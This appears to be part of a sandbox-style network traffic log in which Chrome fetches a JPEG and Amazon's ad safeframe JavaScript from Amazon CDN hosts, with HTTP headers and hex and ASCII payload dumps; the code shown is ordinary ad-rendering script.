                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 3521
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: e4955a7c-17b0-4dda-ab7e-cdf8d2fe066e
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 16 Aug 2024 07:30:47 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Expires: Thu, 11 Aug 2044 11:58:54 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 455390
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:44 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100119-IAD, cache-nyc-kteb1890035-NYC
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: ff d8 ff db 00 84 00 0a 07 07 07 08 07 0a 08 08 0a 0e 09 08 09 0e 11 0d 0a 0a 0d 11 14 10 10 11 10 10 14 13 0f 11 10 10 11 0f 13 13 17 17 19 17 17 13 1e 1e 20 20 1e 1e 2c 2b 2b 2b 2c 31 31 31 31 31 31 31 31 31 31 01 0b 09 09 0b 0c 0b 0d 0b 0b 0d 11 0e 0e 0e 11 14 0e 0e 0e 0e 14 18 10 10 11 10 10 18 1e 16 13 13 13 13 16 1e 1b 1d 19 19 19 1d 1b 21 21 1e 1e 21 21 29 29 28 29 29 31 31 31 31 31 31 31 31 31 31 ff dd 00 04 00 0c ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff c0 00 11 08 00 74 00 ba 03 00 22 00 01 11 01 02 11 01 ff c4 00 a4 00 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 06 07 03 04 05 02 01 01 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 02 04 01 03 06 05 10 00 01 03 03 03 02 01 09 03 09 06 07 00 00 00 00 01 00 02 03 04 05 11 06
                                                                                                                                                                                                                                                                      Data Ascii: ,+++,1111111111!!!!))())1111111111Adobedt"
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 54 b4 76 ea 37 07 23 e0 e0 41 5d 95 b1 57 54 52 9a 94 65 28 c9 bb 4f 9f 90 88 88 44 22 22 00 88 88 02 22 20 3f ff d2 b1 d1 11 5f 39 a0 88 88 02 22 20 08 88 80 2c 35 95 70 d1 52 4d 57 3b b6 c3 03 0b de 7e 0d 19 e1 66 50 4f 29 d7 9e 8d 24 36 88 9d eb 2a 4f 56 a0 03 c8 8d a7 d0 07 ef 3b 9f a2 c4 9d 2b 36 61 c6 f2 64 8c 3d 5f 3f 1e 64 0a 59 2b 2f b7 a2 fc 6e aa b8 4f 86 b7 c0 17 9c 01 f2 68 fe 4a da bc d9 f6 69 1a 8b 55 1b 73 d1 a6 0d 8d a3 bb 8c 78 7f e2 ed aa 1d e4 c6 cf d7 af 9a eb 20 f5 74 83 a7 09 f7 ca f1 e9 1f e1 6f f5 56 73 dc d6 34 bd e4 35 ad 04 b8 9e c0 0e e5 46 0b 86 df 99 6b 59 9a b2 42 11 e9 8e 9d 7b 94 66 9c bb 36 cd 79 a7 b8 3d 86 48 e2 2e 12 31 b8 dc 5a f6 96 1c 67 c4 67 2b b5 ae 75 3d ae fc da 36 d1 32 50 ea 63 21 7b a4 68 6f 0f db c0 c3 8f
                                                                                                                                                                                                                                                                      Data Ascii: Tv7#A]WTRe(OD""" ?_9" ,5pRMW;~fPO)$6*OV;+6ad=_?dY+/nOhJiUsx toVs45FkYB{f6y=H.1Zgg+u=62Pc!{ho
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC765INData Raw: f5 d5 b9 93 37 6c bd 20 f2 de c4 6e a6 73 b1 f4 ca a1 93 2c a5 ad 58 53 fc 30 8c 65 2a fd 52 7c 2f b1 ed e9 34 f1 87 65 e4 d4 49 2d f9 65 38 45 3f d1 08 f2 fe e5 ae 88 8a f9 e2 04 44 40 11 11 00 44 44 01 73 75 1d c5 b6 db 1d 6d 69 ef 14 44 37 c3 d2 7f a0 cf fc 9c 16 a5 ff 00 58 5a 2c 4e 30 d4 b9 f2 55 6d 0e 10 c6 d2 70 0f 62 f7 e3 6b 47 cc a8 15 5e bb b8 5e 1d 3b 43 23 9a 84 b4 b7 cd 62 39 11 b8 76 32 ef 18 98 1f 87 0b 46 7c ca 30 96 c4 e7 2e 55 2f 5f 92 f6 8b 43 3c 99 31 ca 75 08 5a 95 cf cd 75 e9 ee 47 29 aa e5 8a ba 08 64 7b 4f 9b fe 73 2e e2 58 1e fe cd dc e6 ee 01 bc 87 76 2b 7e a0 51 9a 97 c7 e7 67 79 7e d7 8d 86 68 64 73 dc 24 2c 6c d0 02 79 20 0e 5a 16 d5 be e7 6f 92 a8 c7 70 b7 53 d3 ba 70 21 96 6a 66 f9 ab df b7 bf aa 94 49 1b f9 ee 32 16 49 a9
                                                                                                                                                                                                                                                                      Data Ascii: 7l ns,XS0e*R|/4eI-e8E?D@DDsumiD7XZ,N0UmpbkG^^;C#b9v2F|0.U/_C<1uZuG)d{Os.Xv+~Qgy~hds$,ly ZopSp!jfI2I


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      79192.168.2.549803151.101.193.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC411OUTGET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.af25278b.js HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1330INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 30946
                                                                                                                                                                                                                                                                      Content-Type: text/javascript
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 811de2e3-b5b5-4811-8bef-e6b5229ae4a1
                                                                                                                                                                                                                                                                      Cache-Control: max-age=15552000,public
                                                                                                                                                                                                                                                                      Last-Modified: Sat, 17 Aug 2024 01:10:55 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                                                                                      Expires: Thu, 13 Feb 2025 01:11:31 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 105323
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:44 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100072-IAD, cache-ewr-kewr1740029-EWR
                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC75INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 22 73 66 49 6d 70 72 65 73 73 69 6f 6e 22 2c 74 3d 22 4c 69 67 68 74 41 64 49 6d 70 72 65 73 73 69 6f 6e 22 2c 69 3d 22 76 69 65 77 61 62 6c 65 6c 61 74 65 6e 63 79 22 2c 61 3d 28 65 2c 74 2c 69 29 3d 3e 28 7b 63 73 61 4b 65 79 3a 65 2c 63 73 6d 4b 65 79 3a 74 2c 63 73 6d 4d 65 73 73 61 67 65 3a 69 7d 29 2c 73 3d 28 61 28 22 62 6f 64 79 42 65 67 69 6e 22 2c 22 62 62 22 2c 65 29 2c 61 28 22 62 6f 64 79 42 65 67 69 6e 22 2c 22 62 62 22 2c 74 29 2c 61 28 22 62 6f 64 79 45 6e 64 22 2c 22 62 65 22 29 29 2c 72 3d 28 61 28 22 63 6c 69 63 6b 54 6f 41 54 46 22 2c 22 61 66 22 29 2c 61 28 22 63 72 69 74 69 63 61 6c 46 65 61 74 75 72 65 22 2c 22 63 66 22 29 29 2c 6e 3d 28 61 28 22 63 72 69 74 69 63 61 6c 46 65 61 74 75 72 65
                                                                                                                                                                                                                                                                      Data Ascii: (()=>{const e="sfImpression",t="LightAdImpression",i="viewablelatency",a=(e,t,i)=>({csaKey:e,csmKey:t,csmMessage:i}),s=(a("bodyBegin","bb",e),a("bodyBegin","bb",t),a("bodyEnd","be")),r=(a("clickToATF","af"),a("criticalFeature","cf")),n=(a("criticalFeature
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 2e 70 61 79 6c 6f 61 64 2c 66 3d 76 6f 69 64 20 30 21 3d 3d 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 76 69 65 77 61 62 69 6c 69 74 79 53 74 61 6e 64 61 72 64 73 29 3f 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 76 69 65 77 61 62 69 6c 69 74 79 53 74 61 6e 64 61 72 64 73 3a 6e 75 6c 6c 2c 6e 75 6c 6c 3d 3d 3d 66 26 26 64 65 6c 65 74 65 20 4d 2e 76 69 65 77 61 62 69 6c 69 74 79 53 74 61 6e 64 61 72 64 73 7d 2c 49 3d 22 61 64 6c 6f 61 64 5f 72 65 6e 64 65 72 73 74 61 72 74 22 2c 53 3d 22 61 64 6c 6f 61 64 5f 72 65 6e 64 65 72 65 6e 64 22 2c 41 3d 22 69 6d 70 72 65 73 73 69 6f 6e 22 2c 5f 3d 22 76 69 65 77 61 62 69 6c 69 74 79 22 2c 4e 3d 22 75 6e 73 65 72 76 65 64 76 69 65 77 61 62 69 6c 69 74 79 22 2c 44 3d 22 61 64 6c 6f 61 64 3a 72 65
                                                                                                                                                                                                                                                                      Data Ascii: .payload,f=void 0!==(null==e?void 0:e.viewabilityStandards)?null==e?void 0:e.viewabilityStandards:null,null===f&&delete M.viewabilityStandards},I="adload_renderstart",S="adload_renderend",A="impression",_="viewability",N="unservedviewability",D="adload:re
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 74 68 69 73 2e 77 61 69 74 46 6f 72 4d 65 73 73 61 67 65 50 72 6f 63 65 73 73 65 64 3d 61 73 79 6e 63 20 65 3d 3e 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 74 3d 3e 74 68 69 73 2e 70 65 6e 64 69 6e 67 4d 65 73 73 61 67 65 73 2e 73 65 74 28 65 2c 74 29 29 29 2c 74 68 69 73 2e 72 65 63 65 69 76 65 4d 65 73 73 61 67 65 3d 65 3d 3e 7b 74 72 79 7b 63 6f 6e 73 74 20 69 3d 65 2e 64 61 74 61 2c 61 3d 69 2e 63 6f 6d 6d 61 6e 64 3f 69 2e 63 6f 6d 6d 61 6e 64 2e 73 70 6c 69 74 28 22 2e 22 29 3a 5b 5d 3b 6c 65 74 20 73 3d 74 68 69 73 2e 63 5b 61 5b 30 5d 5d 3b 66 6f 72 28 6c 65 74 20 65 3d 31 3b 65 3c 61 2e 6c 65 6e 67 74 68 26 26 73 3b 65 2b 2b 29 73 3d 73 5b 61 5b 65 5d 5d 3b 69 66 28 22 63 75 73 74 6f 6d 4d 65 73 73 61 67 65 22 3d 3d 3d 69 2e 63 6f 6d 6d 61 6e 64 29
                                                                                                                                                                                                                                                                      Data Ascii: this.waitForMessageProcessed=async e=>new Promise((t=>this.pendingMessages.set(e,t))),this.receiveMessage=e=>{try{const i=e.data,a=i.command?i.command.split("."):[];let s=this.c[a[0]];for(let e=1;e<a.length&&s;e++)s=s[a[e]];if("customMessage"===i.command)
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 74 68 28 22 3b 22 29 2c 63 3d 6e 2e 73 74 61 72 74 73 57 69 74 68 28 22 25 22 29 26 26 6f 2e 73 74 61 72 74 73 57 69 74 68 28 22 25 22 29 26 26 22 25 33 44 22 3d 3d 3d 6c 3b 69 3d 64 3f 69 2e 72 65 70 6c 61 63 65 28 4b 2c 58 2b 61 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2b 51 29 3a 63 3f 69 2e 72 65 70 6c 61 63 65 28 4b 2c 58 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 29 2b 51 29 3a 69 2e 72 65 70 6c 61 63 65 28 4b 2c 58 2b 61 2b 51 29 7d 77 68 69 6c 65 28 73 26 26 72 3c 31 30 29 7d 63 61 74 63 68 28 68 29 7b 72 65 74 75 72 6e 20 74 7d 72 65 74 75 72 6e 20 69 7d 3b 63 6f 6e 73 74 20 5a 3d 28 65 2c 74 2c 69 2c 61 29 3d 3e 7b 74 72 79 7b 74 2e 63 6f 75 6e 74 4d 65 74 72 69 63 28 44 2c 31 29 2c 74 2e 6c 6f 67 43
                                                                                                                                                                                                                                                                      Data Ascii: th(";"),c=n.startsWith("%")&&o.startsWith("%")&&"%3D"===l;i=d?i.replace(K,X+a.replace(/&/g,"&amp;")+Q):c?i.replace(K,X+encodeURIComponent(a)+Q):i.replace(K,X+a+Q)}while(s&&r<10)}catch(h){return t}return i};const Z=(e,t,i,a)=>{try{t.countMetric(D,1),t.logC
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 68 7d 60 29 7d 2c 6c 65 3d 61 73 79 6e 63 20 65 3d 3e 7b 63 6f 6e 73 74 20 74 3d 61 77 61 69 74 28 61 77 61 69 74 20 66 65 74 63 68 28 65 29 29 2e 74 65 78 74 28 29 3b 72 65 74 75 72 6e 20 64 65 28 74 29 7d 2c 64 65 3d 65 3d 3e 7b 74 72 79 7b 72 65 74 75 72 6e 20 4a 53 4f 4e 2e 70 61 72 73 65 28 65 29 2e 63 72 65 61 74 69 76 65 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 65 7d 7d 2c 63 65 3d 28 65 2c 74 29 3d 3e 7b 69 66 28 22 53 45 52 56 45 52 5f 53 49 44 45 22 3d 3d 3d 65 2e 63 72 65 61 74 69 76 65 2e 66 6c 6f 77 29 72 65 74 75 72 6e 20 61 3d 65 2e 68 74 6d 6c 43 6f 6e 74 65 6e 74 45 6e 63 6f 64 65 64 2c 73 3d 65 2e 68 74 6d 6c 43 6f 6e 74 65 6e 74 45 6e 63 6f 64 65 64 4c 65 6e 67 74 68 2c 7b 67 65 74 41 64 3a 61 73 79 6e 63 28 29 3d 3e 28 7b 63
                                                                                                                                                                                                                                                                      Data Ascii: h}`)},le=async e=>{const t=await(await fetch(e)).text();return de(t)},de=e=>{try{return JSON.parse(e).creative}catch(t){return e}},ce=(e,t)=>{if("SERVER_SIDE"===e.creative.flow)return a=e.htmlContentEncoded,s=e.htmlContentEncodedLength,{getAd:async()=>({c
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 69 73 2e 6d 70 2e 6f 6e 6d 65 73 73 61 67 65 3d 74 68 69 73 2e 63 6d 72 2e 72 65 63 65 69 76 65 4d 65 73 73 61 67 65 2c 74 68 69 73 2e 63 2e 63 6f 75 6e 74 4d 65 74 72 69 63 28 22 61 64 6c 6f 61 64 3a 69 66 72 61 6d 65 69 6e 69 74 69 61 6c 69 7a 65 64 22 2c 31 29 2c 74 68 69 73 2e 63 2e 6c 6f 67 43 73 61 45 76 65 6e 74 28 22 61 64 6c 6f 61 64 5f 69 66 72 61 6d 65 69 6e 69 74 69 61 6c 69 7a 65 64 22 29 2c 6e 65 77 20 52 28 77 69 6e 64 6f 77 2c 22 41 44 50 54 5f 53 46 5f 52 45 53 49 5a 45 5f 41 53 50 45 43 54 5f 52 41 54 49 4f 5f 39 30 39 32 32 36 22 29 2e 69 73 54 31 28 29 7c 7c 28 28 65 2c 74 29 3d 3e 7b 74 2e 64 69 73 61 62 6c 65 52 65 73 69 7a 65 46 75 6e 63 7c 7c 65 2e 73 65 6e 64 4d 65 73 73 61 67 65 28 22 72 65 73 69 7a 65 53 61 66 65 46 72 61 6d 65
                                                                                                                                                                                                                                                                      Data Ascii: is.mp.onmessage=this.cmr.receiveMessage,this.c.countMetric("adload:iframeinitialized",1),this.c.logCsaEvent("adload_iframeinitialized"),new R(window,"ADPT_SF_RESIZE_ASPECT_RATIO_909226").isT1()||((e,t)=>{t.disableResizeFunc||e.sendMessage("resizeSafeFrame
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 65 61 74 69 76 65 54 65 6d 70 6c 61 74 65 4e 61 6d 65 2c 61 73 79 6e 63 28 29 3d 3e 74 68 69 73 2e 6c 6f 61 64 41 64 28 74 29 29 3a 61 73 79 6e 63 28 29 3d 3e 7b 77 65 28 29 2c 74 68 69 73 2e 66 6f 72 63 65 52 65 6e 64 65 72 46 61 6c 6c 62 61 63 6b 45 78 70 65 72 69 65 6e 63 65 28 29 7d 3b 76 61 72 20 73 2c 72 2c 6e 7d 63 61 74 63 68 28 6f 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 63 2e 6c 6f 67 45 72 72 6f 72 28 22 43 6f 75 6c 64 6e 27 74 20 67 65 74 41 64 20 66 72 6f 6d 20 68 74 6d 6c 50 72 6f 76 69 64 65 72 22 2c 6f 29 2c 61 73 79 6e 63 28 29 3d 3e 7b 77 65 28 29 2c 74 68 69 73 2e 66 6f 72 63 65 52 65 6e 64 65 72 46 61 6c 6c 62 61 63 6b 45 78 70 65 72 69 65 6e 63 65 28 29 7d 7d 7d 2c 74 68 69 73 2e 65 6e 73 75 72 65 47 6c 6f 62 61 6c 73 3d 28 29 3d 3e
                                                                                                                                                                                                                                                                      Data Ascii: eativeTemplateName,async()=>this.loadAd(t)):async()=>{we(),this.forceRenderFallbackExperience()};var s,r,n}catch(o){return this.c.logError("Couldn't getAd from htmlProvider",o),async()=>{we(),this.forceRenderFallbackExperience()}}},this.ensureGlobals=()=>
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 62 61 63 6b 53 74 61 74 69 63 41 64 48 65 6c 70 65 72 28 29 2c 74 68 69 73 2e 65 6e 73 75 72 65 47 6c 6f 62 61 6c 73 28 29 2c 74 68 69 73 2e 6d 70 2e 6f 6e 6d 65 73 73 61 67 65 3d 74 68 69 73 2e 63 6d 72 2e 72 65 63 65 69 76 65 4d 65 73 73 61 67 65 7d 2c 74 68 69 73 2e 6c 6f 61 64 41 64 3d 61 73 79 6e 63 20 65 3d 3e 7b 74 68 69 73 2e 6f 2e 69 73 4e 6f 49 6e 76 65 6e 74 6f 72 79 3d 21 31 2c 66 65 28 74 68 69 73 2e 63 2c 74 68 69 73 2e 6f 2c 74 68 69 73 2e 63 6d 73 29 3b 6c 65 74 20 74 3d 59 28 74 68 69 73 2e 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 50 61 72 61 6d 2c 65 29 3b 74 68 69 73 2e 69 73 56 69 64 65 6f 28 29 3f 6e 65 77 20 52 28 77 69 6e 64 6f 77 2c 22 41 44 50 54 5f 53 46 5f 41 44 53 50 5f 56 49 44 45 4f 5f 38 33 33 34 31 39 22 29 2e 69 73 54 31 28
                                                                                                                                                                                                                                                                      Data Ascii: backStaticAdHelper(),this.ensureGlobals(),this.mp.onmessage=this.cmr.receiveMessage},this.loadAd=async e=>{this.o.isNoInventory=!1,fe(this.c,this.o,this.cms);let t=Y(this.clickTrackingParam,e);this.isVideo()?new R(window,"ADPT_SF_ADSP_VIDEO_833419").isT1(
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 74 2e 6c 6f 67 45 72 72 6f 72 28 22 45 72 72 6f 72 20 61 70 70 65 6e 64 69 6e 67 20 62 6c 61 6e 6b 41 64 53 63 72 69 70 74 22 2c 69 29 7d 7d 2c 76 65 3d 65 3d 3e 21 21 28 22 74 72 75 65 22 21 3d 3d 65 2e 61 62 70 41 63 63 65 70 74 61 62 6c 65 26 26 65 2e 61 62 70 53 74 61 74 75 73 26 26 65 2e 65 6e 61 62 6c 65 46 61 6c 6c 62 61 63 6b 46 6f 72 41 62 70 53 74 61 74 75 73 65 73 26 26 65 2e 65 6e 61 62 6c 65 46 61 6c 6c 62 61 63 6b 46 6f 72 41 62 70 53 74 61 74 75 73 65 73 2e 69 6e 64 65 78 4f 66 28 6d 5b 65 2e 61 62 70 53 74 61 74 75 73 5d 29 3e 2d 31 29 2c 70 65 3d 61 73 79 6e 63 20 65 3d 3e 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 74 3d 3e 7b 6c 65 74 20 69 3d 2d 31 3b 63 6f 6e 73 74 20 61 3d 65 3d 3e 7b 63 6f 6e 73 74 20 61 3d 65 2e 64 61 74 61 2c 73 3d 22
                                                                                                                                                                                                                                                                      Data Ascii: t.logError("Error appending blankAdScript",i)}},ve=e=>!!("true"!==e.abpAcceptable&&e.abpStatus&&e.enableFallbackForAbpStatuses&&e.enableFallbackForAbpStatuses.indexOf(m[e.abpStatus])>-1),pe=async e=>new Promise((t=>{let i=-1;const a=e=>{const a=e.data,s="


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      80192.168.2.54979418.239.24.1884432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC661OUTGET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.af25278b.js HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                      Referer: https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.f3986821.html
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1631INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: text/javascript
                                                                                                                                                                                                                                                                      Content-Length: 30946
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 811de2e3-b5b5-4811-8bef-e6b5229ae4a1
                                                                                                                                                                                                                                                                      Date: Sat, 17 Aug 2024 01:11:31 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=15552000,public
                                                                                                                                                                                                                                                                      Last-Modified: Sat, 17 Aug 2024 01:10:55 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-886,/images/S/apesafeframe/ape/sf/desktop/sf-1.50.af25278b
                                                                                                                                                                                                                                                                      Expires: Thu, 13 Feb 2025 01:11:31 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-886 /images/S/apesafeframe/ape/sf/desktop/sf-1.50.af25278b
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                      Via: 1.1 916d412afdd39cf0d9689036f0f43bb4.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 407825
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P6
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: nBvE8RyK8OYOptgwz7Rv6C0e02l9fvpstJCg4Y976MDUQb-GhFn_1g==
